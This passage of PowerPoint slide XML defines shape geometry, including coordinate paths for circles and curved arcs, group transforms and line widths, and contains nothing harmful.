            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6642354" y="3632453"/>
              <a:ext cx="3017520" cy="3017520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3017520" h="3017520">
                  <a:moveTo>
                    <a:pt x="0" y="1508760"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="745" y="1460866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="1413345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6645" y="1366218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11755" y="1319507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18276" y="1273235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26185" y="1227423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35460" y="1182094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46080" y="1137269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58021" y="1092972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71263" y="1049223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85783" y="1006045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101558" y="963460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118568" y="921490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136789" y="880157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156200" y="839484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176778" y="799492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198502" y="760203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221349" y="721641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245297" y="683826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270324" y="646780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296408" y="610527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323527" y="575088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351660" y="540484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380782" y="506739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410874" y="473874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441912" y="441912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473874" y="410874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506739" y="380782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540484" y="351660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575088" y="323527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610527" y="296408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646780" y="270324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683826" y="245297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721641" y="221349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760203" y="198502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799492" y="176778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839484" y="156200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880157" y="136789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921490" y="118568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963460" y="101558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006045" y="85783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049223" y="71263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092972" y="58021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137269" y="46080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182094" y="35460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227423" y="26185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273235" y="18276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319507" y="11755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366218" y="6645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413345" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460866" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508760" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556653" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604174" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651301" y="6645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698012" y="11755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744284" y="18276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790096" y="26185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835425" y="35460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880250" y="46080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924547" y="58021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968296" y="71263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011474" y="85783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054059" y="101558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096029" y="118568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137362" y="136789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178035" y="156200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218027" y="176778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257316" y="198502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295878" y="221349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2333693" y="245297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370739" y="270324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406992" y="296408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442431" y="323527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477035" y="351660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510780" y="380782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543645" y="410874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575607" y="441912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606645" y="473874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636737" y="506739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665859" y="540484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693992" y="575088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721111" y="610527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747195" y="646780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772222" y="683826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796170" y="721641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819017" y="760203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840741" y="799492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861319" y="839484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2880730" y="880157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2898951" y="921490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915961" y="963460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931736" y="1006045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946256" y="1049223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959498" y="1092972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971439" y="1137269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982059" y="1182094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2991334" y="1227423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999243" y="1273235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3005764" y="1319507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010874" y="1366218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014551" y="1413345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016774" y="1460866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3017520" y="1508760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016774" y="1556653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014551" y="1604174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010874" y="1651301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3005764" y="1698012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999243" y="1744284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2991334" y="1790096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982059" y="1835425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971439" y="1880250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959498" y="1924547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946256" y="1968296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931736" y="2011474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915961" y="2054059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2898951" y="2096029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2880730" y="2137362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861319" y="2178035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840741" y="2218027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819017" y="2257316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796170" y="2295878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772222" y="2333693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747195" y="2370739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721111" y="2406992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693992" y="2442431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665859" y="2477035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636737" y="2510780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606645" y="2543645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575607" y="2575607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543645" y="2606645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510780" y="2636737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477035" y="2665859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442431" y="2693992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406992" y="2721111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370739" y="2747195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2333693" y="2772222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295878" y="2796170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257316" y="2819017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218027" y="2840741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178035" y="2861319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137362" y="2880730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096029" y="2898951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054059" y="2915961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011474" y="2931736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968296" y="2946256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924547" y="2959498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880250" y="2971439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835425" y="2982059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790096" y="2991334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744284" y="2999243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698012" y="3005764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651301" y="3010874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604174" y="3014551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556653" y="3016774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508760" y="3017520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460866" y="3016774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413345" y="3014551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366218" y="3010874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319507" y="3005764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273235" y="2999243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227423" y="2991334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182094" y="2982059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137269" y="2971439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092972" y="2959498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049223" y="2946256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006045" y="2931736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963460" y="2915961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921490" y="2898951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880157" y="2880730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839484" y="2861319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799492" y="2840741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760203" y="2819017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721641" y="2796170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683826" y="2772222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646780" y="2747195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610527" y="2721111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575088" y="2693992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540484" y="2665859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506739" y="2636737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473874" y="2606645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441912" y="2575607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410874" y="2543645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380782" y="2510780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351660" y="2477035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323527" y="2442431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296408" y="2406992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270324" y="2370739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245297" y="2333693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221349" y="2295878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198502" y="2257316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176778" y="2218027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156200" y="2178035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136789" y="2137362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118568" y="2096029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101558" y="2054059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85783" y="2011474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71263" y="1968296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58021" y="1924547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46080" y="1880250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35460" y="1835425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26185" y="1790096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18276" y="1744284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11755" y="1698012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6645" y="1651301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="1604174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745" y="1556653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1508760"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="3946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344914" y="4223384"/>
              <a:ext cx="314325" cy="1838960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="314325" h="1838960">
                  <a:moveTo>
                    <a:pt x="3428" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32410" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59972" y="78954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86116" y="119424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110840" y="160511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134146" y="202180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156034" y="244397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176503" y="287127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195554" y="330336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213186" y="373989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229400" y="418052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244196" y="462491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257574" y="507272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269535" y="552359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280077" y="597718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289201" y="643315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296908" y="689116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303198" y="735087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308070" y="781192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311524" y="827397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313562" y="873669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314182" y="919972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313385" y="966272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311171" y="1012535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307540" y="1058726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302492" y="1104812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296028" y="1150757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288147" y="1196527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278849" y="1242088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268135" y="1287405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256005" y="1332444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242458" y="1377171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227496" y="1421551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211117" y="1465550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193322" y="1509133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174111" y="1552266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153485" y="1594914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131443" y="1637044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107985" y="1678620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83112" y="1719609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56823" y="1759976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29119" y="1799686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1838706"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="76200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276588" y="4759451"/>
              <a:ext cx="762000" cy="762000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="762000">
                  <a:moveTo>
                    <a:pt x="381000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333204" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333204" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="2968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9564751" y="4946650"/>
            <a:ext cx="1847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0" b="1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263640" y="4185284"/>
            <a:ext cx="762000" cy="1915160"/>
            <a:chOff x="6263640" y="4185284"/>
            <a:chExt cx="762000" cy="1915160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6641608" y="4223384"/>
              <a:ext cx="314325" cy="1838960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="314325" h="1838960">
                  <a:moveTo>
                    <a:pt x="310753" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281771" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254209" y="78954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228065" y="119424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203341" y="160511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180035" y="202180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158147" y="244397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137678" y="287127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118627" y="330336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100995" y="373989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84781" y="418052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69985" y="462491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56607" y="507272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44647" y="552359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34104" y="597718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24980" y="643315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17273" y="689116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10983" y="735087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6111" y="781192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657" y="827397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620" y="873669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="919972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796" y="966272"/>
                  </a:lnTo>
